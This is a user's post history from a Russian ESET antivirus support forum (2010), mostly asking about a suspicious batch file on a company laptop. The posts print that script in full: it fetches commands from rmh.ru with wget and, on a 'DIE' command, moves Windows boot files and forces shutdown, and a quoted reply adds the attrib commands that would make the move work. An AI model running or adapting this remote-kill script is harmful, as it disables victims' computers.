Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи Vitokhv
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 29 30 31 32 33 34 35 36 37 38 39 ... 41 След.
Вирус bwedky.exe
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 15.07.2010 10:50:14
virusesnod32@gmail.com

Не могу я отправить Вам
Вот пытался:

Статус доставки:
messagedelivery-status1.2

Reporting-MTA: dns; forward14.mail.yandex.net
X-Yandex-Queue-ID: 042CA4E5110A
X-Yandex-Sender: rfc822; [email protected]
Arrival-Date: Thu, 15 Jul 2010 10:20:49 +0400 (MSD)

Final-Recipient: rfc822; [email protected]
Original-Recipient: rfc822;[email protected]
Action: failed
Status: 5.7.0
Remote-MTA: dns; gmail-smtp-in.l.google.com
Diagnostic-Code: smtp; 552-5.7.0 Our system detected an illegal attachment on
   your message. Please 552-5.7.0 visit
   http://mail.google.com/support/bin/answer.py?answer=6590 to 552 5.7.0
   review our attachment guidelines. r23si31936fam.169
609





*********

Это письмо отправлено почтовым сервером yandex.ru

К сожалению, мы вынуждены сообщить Вам о том, что Ваше письмо не может
быть отправлено одному или нескольким адресатам. Причины указаны ниже.

Пожалуйста, не отвечайте на это сообщение.

             **********

This is the mail system at host yandex.ru

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

Please, do not reply to this message.


<[email protected]>: host gmail-smtp-in.l.google.com[74.125.43.27] said:
   552-5.7.0 Our system detected an illegal attachment on your message. Please
   552-5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to
   552 5.7.0 review our attachment guidelines. r23si31936fam.169 (in reply to
   end of DATA command)
Изменено: Виктор - 15.07.2010 10:50:48
Перейти
Вирус bwedky.exe
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 15.07.2010 10:43:50
Как удалить?
Нет кнопки "Правка/Изменить"

Убрал галку "Публичный"
Установил пароль на скачивание.
Изменено: Виктор - 15.07.2010 10:46:07
Перейти
Вирус bwedky.exe
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 15.07.2010 10:29:14
Возможно данный файл прописывает маршруты.
Залил: http://rghost.ru/2125511
Отчет сканера: http://www.virscan.org/report/e9eeb29a2913192e71762d0018a5461e.html
Перейти
Запланированные задания (угроза)
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 13.07.2010 10:07:40
Ни одного ответа от Администраторов.
Перейти
Запланированные задания (угроза)
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 12.07.2010 03:01:08
Цитата
системные файлы перенести не так уж просто.
надо для начала атрибуты им поменять. без этого получается такое:

C:\>move /y c:\boot.ini c:\windows
Не удается найти указанный файл.

C:\>move /y c:\ntdetect.com c:\windows
Не удается найти указанный файл.

C:\>move /y c:\ntldr c:\windows
Не удается найти указанный файл.

C:\>attrib boot.ini
SHR C:\boot.ini

C:\>attrib ntdetect.com
A SHR C:\NTDETECT.COM

C:\>attrib ntldr
A SHR C:\ntldr

C:\>

т.е. "плохой батник" должен начинаться со строчек
attrib -shr +a boot.ini
attrib -shr ntdetect.com
attrib -shr ntldr

и то я сильно сомневаюсь, что винда "разрешит" такие изменения.
Перейти
Запланированные задания (угроза)
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 11.07.2010 17:34:56
Может данным методом при последующей установки ОС файл уживается в системе?
Перейти
Запланированные задания (угроза)
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 11.07.2010 13:47:24
Подскажите о каких сведениях может идти речь?

Сайт в структуре bat файла RMH.RU
Перейти
Запланированные задания (угроза)
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 11.07.2010 13:39:12
Здравствуйте! объясните пожалуйста смысл файла main.bat который запускается автозагрузкой и включает задачи странного названия.

Были выполнены действия:
1) c:\windows\system32\main.bat удалил файл.
2) Удалил файлы:
c:\windows\tasks\at1.job
c:\windows\tasks\at2.job
c:\windows\tasks\at3.job
c:\windows\tasks\at4.job
c:\windows\tasks\At1.job
c:\windows\tasks\At2.job
c:\windows\tasks\At3.job
c:\windows\tasks\At4.job

route print - чист

Структура bat файла:
Код
@echo off
cd c:\windows\system32
:begin
echo Searching for IP adress...
ipconfig | grep IP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noip

:ipfound
echo IP address found in ipconfig output
echo Pinging RMH.RU
ping -n 1 rmh.ru | grep.exe Ping
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noreply

:inet
echo Reply from RMH.RU retrieved
echo Empty command
echo > command.txt
echo Retrieving command from server...
wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1
echo Retrieved, checking command
type command.txt | grep STOP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto end


:STOP
type command.txt | grep STOP > nul
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto wcommand

:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end

:noip
echo IP address not found in ipconfig output
goto end

:noreply
echo No reply from RMH.RU
goto end

:wcommand
echo Wrong command retrieved. Typing command:
echo ---
type command.txt
echo ---
goto end

:error
echo Grep error
goto end

:end


Вопрос такого характера - ноутбук, предоставлен компанией "Ромир", у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту.
Перейти
Долго ещё порнобанеры будет пробивать Nod32 как снаряд салфетку?
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 07.07.2010 06:21:39
Компьютер в качестве шлюза, на котором установлена антивирусная система и большая часть антишпионских программ. Процент можно повышать до 70%
Интернет провайдер > Компьютер-шлюз (Symantec) > Компьютер-основной (NOD32)
Перейти
Предложения по работе технической поддержки
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 07.07.2010 04:50:48
cheremburum cheremburum,
Цитата
видимо админы сайта не особо разборчивы при выборе партнёров
Ты будешь? думать о безопасности клиентов когда за один клик на партнерскую ссылку тебе заплатят как минимум 1$
Изменено: Виктор - 07.07.2010 04:51:59
Перейти
Пред. 1 ... 29 30 31 32 33 34 35 36 37 38 39 ... 41 След.